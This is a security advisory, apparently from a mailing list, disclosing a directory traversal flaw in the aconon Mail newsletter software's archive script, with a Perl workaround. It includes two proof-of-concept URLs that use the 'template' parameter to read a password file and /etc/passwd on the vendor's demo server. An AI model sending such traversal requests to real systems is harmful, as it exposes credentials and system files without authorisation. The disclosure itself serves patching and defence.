aconon-traverse.txt

`Application: aconon(R) Mail  
  
Affected versions: probably all known, tested against 2007 Enterprise  
SQL 11.7.0 and 2004 Enterprise SQL 11.5.1  
  
Affected plattforms: every, Aconon runs at (Win32, Linux, Solaris ...)  
  
Exploitation: remote  
  
Description: Aconon Mail is a commercial newsletter software, providing  
a feature rich web interface for both, users and administrators. This  
includes a public available archive of sent newsletters. Those archived  
e-mails may be accessed through the web browser, processed by a template  
engine. The used template may be overwritten by any user, modifying the  
HTTP-GET "template" form parameter. This parameter is checked against  
code injection, not against directory traversal though.  
  
Proof of Concept:  
  
http://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C  
vhttp://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C  
  
Fix:  
  
No fix has been published yet. However this workaround should patch the  
issue:  
  
Add in archiv.cgi below  
$FORM{'template'} =~ s/\|//g;  
  
this code:  
  
use File::Basename;  
$FORM{'template'} = ($FORM{'template'}) ? basename($FORM{'template'})  
: "";  
if ($FORM{'template'} && $FORM{'template'} !~ /\.html$/) {  
&error ("$TXT{'1501'}");  
}  
  
Status: the vendor has been informed.  
  
  
German readers of the list may also read  
http://burnachurch.com/67/directory-traversal-luecke-in-aconon-mail/  
  
P.S. greets to missi - you're great :o)  
  
`